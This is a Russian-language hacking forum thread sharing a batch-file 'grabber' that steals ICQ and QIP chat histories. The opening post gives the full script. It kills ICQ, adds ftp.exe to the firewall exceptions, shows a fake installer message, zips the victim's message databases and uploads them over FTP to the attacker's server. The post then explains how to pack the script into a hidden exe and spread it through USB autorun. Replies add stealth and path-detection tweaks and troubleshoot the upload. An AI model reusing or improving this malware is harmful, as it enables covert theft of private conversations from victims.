[EasyHack] Крадем историю QIP и ICQ вот сделал батник тут недавно, впринципе делал ради одной жертвы, но непригодился в последующем... был бы очень рад каким нибудь дополнениям к нему и усовершенствованиям. также интересует аспект палевности данного батника, хотел бы узнать где он может запалится и на чем если что. Code: @echo off @attrib "%CD%\zip32.exe" +h +s @attrib "%CD%\ftpserv.cmd" +h +s @attrib "%CD%\grab.bat" +h +s @taskkill /f /IM ICQ.exe @netsh firewall add allowedprogram C:\windows\system32\ftp.exe ENABLE @mkdir c:\windows\dump_rep @echo msgbox "........................................................."+chr(13)+chr(13)+"Please wait now..."+chr(13)+chr(13)+"Installing..."+chr(13)+chr(13)+".........................................................",4096,"The Middler! v.0.133 beta">c:\windows\alrt.vbs @start c:\windows\alrt.vbs @ping 1.1.1.1 -n 1 -w 10000 @copy "%APPDATA%\ICQ\*********\Messages.mdb" "c:\windows\dump_rep\dump_ICQ.bin" /y @zip32 "C:\Program Files\QIP\Users" "c:\windows\debug\dump_QIP_new.zip" @copy "c:\windows\debug\dump_QIP_new.zip" "c:\windows\dump_rep\dump_QIP_new.bin" /y @del "c:\windows\debug\dump_QIP_new.zip" @zip32 "%APPDATA%\QIP\Profiles" "c:\windows\debug\dump_QIP_old.zip" @copy "c:\windows\debug\dump_QIP_old.zip" "c:\windows\dump_rep\dump_QIP_old.bin" /y @del "c:\windows\debug\dump_QIP_old.zip" @ftp -s:"%CD%/ftpserv.cmd" @echo msgbox "........................................................."+chr(13)+chr(13)+"Error 1251"+chr(13)+chr(13)+".........................................................",4096,"The Middler! v.0.133 beta">c:\windows\alrtt.vbs @attrib "%CD%\zip32.exe" -h -s @attrib "%CD%\ftpserv.cmd" -h -s @attrib "%CD%\grab.bat" -h -s @del "%CD%\zip32.exe" @del "%CD%\ftpserv.cmd" @del "%CD%\grab.bat" @start c:\windows\alrtt.vbs + сервер Code: o tvoi.ftp.com login password binary cd dmp send c:\windows\dump_rep\dump_ICQ.bin ICQ.bin send c:\windows\dump_rep\dump_QIP_new.bin QIP_N.bin send c:\windows\dump_rep\dump_QIP_old.bin QIP_O.bin bye упаковываем этот батник вместе с сервером с помощью Bat To Exe Converter v1.5 как? 1) как главный файл для компиляции выбираем тело граббера 2) настраиваем: Invisible Application, Temporary Directory, Delete At Exit, Overwrite Existing Files 3) на вкладке Include добавляем (Add) файлы : наш фтп сервер (допустим ftpserv.cmd) и прогу для архивации истории и папок квипа - zip32.exe 4) на вкладке Versioninformations добавляем иконку дистрибутива 5) нажимаем Compile 6) готово как все это работает? после запуска нашего экзешника в %temp% распакуется 3 файла - тело граббера, фтп сервачок, прога для архивации (консольная) - zip32.exe. все эти файлы будут скрыты - как "скрытый" и "системный". дальше убиваем процесс ICQ.ехе - иначе скопировать файлы истории аськи невозможно. добавляем в исключения вин-файрволла прогу ftp.exe - стандартный фтп клиент для виндовозов. создаем папку для копии нашей истории - c:\windows\dump_rep. создаем файл на VBS - простое окно с текстом, якобы установки проги "The Middler" - уж что это за прога итд - тут зависит от вашей фантазии. делаем паузу в 10 секунд, чтобы все операции были окончательно завершены. копируем файл истории жертвы из ICQ в нашу папку dump_rep. архивируем один из возможных путей истории квипа - папку C:\Program Files\QIP\Users. перемещаем ее тоже в папку dump_rep. пробуем тоже самое с %USERPROFILE%\Application Data\QIP\Profiles открываем фтп сервер, который заливает на наш фтп данные файлы. убираем аттрибуты "скрытый" и "системный" с наших файлов и удаляем их. запускаем очередное обаманное окно при помощи VBS - мол при установке проги "The Middler" произошла ошибка 1251. качаем: Bat To Exe Converter v1.5 zip32.exe Setup.ico P.S. незаываем написать ICQ номер жертвы вот тут: Code: @copy "%USERPROFILE%\Application Data\ICQ\NOMER_TUT\Messages.mdb" P.S.S. авторан с флехи: Code: [autorun] shellexecute=compiled.exe где compiled.exe это наш скомпилированный граббер. только придется удалить "запуск установки The Middler" - чтобы вообще без палева Тестированно на winlogon.exe
1\ %USERPROFILE%\Application Data\ = %APPDATA% --> упрощаем код, вес 2\ инфа не обязательно в %APPDATA%, может QIP ставили для всех пользователей ?) т.е. в %ALLUSERSPROFILE%\Application Data\ 3\ QIP 2005 могли и не в Program Files установить + винда не обязательно на диске C, но я сам хз, как это лучше сделать, ну как минимум %ProgramFiles%\QIP\ а насчёт палевности: допустим запускаем мы его с флэшки: 1\ авторан: Code: [autorun] shellexecute=hide_console bat.bat где hide_console прога, я думаю понятно какого назначения, найти в сети интернет не сложно) 2\дописываем в конец батника start ..
хз, я над подобным уже неделю сижу реализация сложная, но видимо возможна, должно быть что-то типа: <вывод нужной строки из reg, regedit> --> дальше по конвееру |find <нужное> --> задание это переменной --> юзаем reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Qip Infium" /v installlocation - вывод директории, куда установили...
дамп создает, но на фтп не отправляет, в чем может быть дело? (специально создал файл dump_ICQ.bin в папке C:\WINDOWS\dump_rep весом 1 кб). запускаю приложение (формат .cmd) сервера в котором у меня прописано PHP: o ftp.narod.ru мой_логин мой_пароль binary cd dmp send c:\windows\dump_rep\dump_ICQ.bin ICQ.bin send c:\windows\dump_rep\dump_QIP_new.bin QIP_N.bin send c:\windows\dump_rep\dump_QIP_old.bin QIP_O.bin bye в чем дело? спасибо
вот кто небудь сделал бы такую хрень, под винд XP, 7 универсальную для QIP(qip infinium) ICQ - было бы здорово !
